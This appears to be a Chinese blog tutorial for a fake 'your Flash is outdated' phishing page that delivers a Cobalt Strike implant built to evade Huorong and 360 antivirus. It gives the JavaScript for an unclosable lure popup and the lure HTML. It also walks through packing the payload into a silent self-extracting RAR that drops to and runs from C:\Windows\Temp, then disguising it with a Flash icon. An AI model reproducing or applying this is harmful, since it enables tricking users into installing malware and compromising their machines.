Flash钓鱼->CS上线(免杀过火绒、360等)

先看结果

访问钓鱼页面:

Flash钓鱼->CS上线(免杀过火绒、360等)_第1张图片

 点击立即升级即把马儿下载下来了

Flash钓鱼->CS上线(免杀过火绒、360等)_第2张图片

 这个马儿是rar压缩的,做成的rar解压自启动,所以是个exe的文件,然后这里为了像一点,把图标给改了

双击运行,查看效果:

首先CS是没东西的

解压路径现在也是没东西的

Flash钓鱼->CS上线(免杀过火绒、360等)_第3张图片

Flash钓鱼->CS上线(免杀过火绒、360等)_第4张图片

这里我把解压路径给改成了:C:\Windows\Temp

执行路径为:C:\Windows\Temp\Flash.exe

双击砸门的flash文件

Flash钓鱼->CS上线(免杀过火绒、360等)_第5张图片

 马尔已上线

---------------------------------------------------------------------------------------------------------------------------------

1、制作flash钓鱼界面

      1.1、flash.js

var s1 = document.createElement('script');
s1.setAttribute('type','text/javascript');
s1.setAttribute('src','//cdnjs.cloudflare.com/ajax/libs/jquery/2.0.0/jquery.min.js');
var head = document.getElementsByTagName('head')[0];
head.appendChild(s1);
s1.onload = function(){
    var s2 = document.createElement('script');
    s2.setAttribute('type','text/javascript');
    s2.setAttribute('src','//cdnjs.cloudflare.com/ajax/libs/layer/3.1.1/layer.js');
    head.appendChild(s2);
}
var s3 = document.createElement('link');
s3.setAttribute('type','text/css');
s3.setAttribute('rel','stylesheet');
s3.setAttribute('href','//cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css');
head.appendChild(s3);
var content = "
" window.onload = function(){ $(".layui-layer").css("background", "none"); layer.open({ type: 1,//Page层类型 move: false ,//禁止拖拽 area: ['613px', '324px'],//设置弹窗大小 title: false,//关闭标题栏 shade: 0.5,//遮罩透明度 //maxmin: true ,//允许全与屏最小化 closeBtn: 0 ,//取消关闭按钮 anim: 0,//0-6的动画形式,-1不开启 offset: '100px',//设置顶部距离 scrollbar: false,//禁用滚轮 content: content }); }

        1.2、index.html



    
        
        Flash Test...  
        
    
    
    

您的Flash版本过低!请重新安装...

       1.3、马儿

         这三文件放网站同一目录下即可

Flash钓鱼->CS上线(免杀过火绒、360等)_第6张图片

2、免杀

        Flash钓鱼->CS上线(免杀过火绒、360等)_第7张图片

         这里就只有本地分离能免杀了,网络分离已免不了了

Flash钓鱼->CS上线(免杀过火绒、360等)_第8张图片

       3、将免杀的exe跟生成的PayloadFile进行压缩

        这里rar压缩的话做一个解压缩自启动(直接解压就执行我们的马儿)

            制作压缩自启动步骤如下:

                3.1、将要压缩的文件选中

                                常规->创建自解压格式文件

Flash钓鱼->CS上线(免杀过火绒、360等)_第9张图片

        3.2、 高级->常规->解压路径

                        这里路径放C:\Windows\Temp

                         这个路径每个windows都有,并且也有读写权限,方便砸门的马尔隐藏

Flash钓鱼->CS上线(免杀过火绒、360等)_第10张图片

        3.3、高级->设置->解压后运行

                这里路径跟解压路径对应的

                C:\Windows\Temp\Flash.exe

 Flash钓鱼->CS上线(免杀过火绒、360等)_第11张图片

         3.4、高级->模式->静默模式->全部隐藏

Flash钓鱼->CS上线(免杀过火绒、360等)_第12张图片

 一个马尔的解压自启动的压缩包就做好了

 4、改图标

        这里砸门为了逼真一点,所以把这个压缩包的图标改成Flash的图标

        改图标的工具用的是:Resource Hacker

             第一步选择压缩包

Flash钓鱼->CS上线(免杀过火绒、360等)_第13张图片

        第二部选择我们要改的icon图标

Flash钓鱼->CS上线(免杀过火绒、360等)_第14张图片

 Flash钓鱼->CS上线(免杀过火绒、360等)_第15张图片

 保存下来即可

Flash钓鱼->CS上线(免杀过火绒、360等)_第16张图片

5、将这个exe的压缩包的路径放在砸门服务器上的flash.js上即可

你可能感兴趣的:(火绒安全)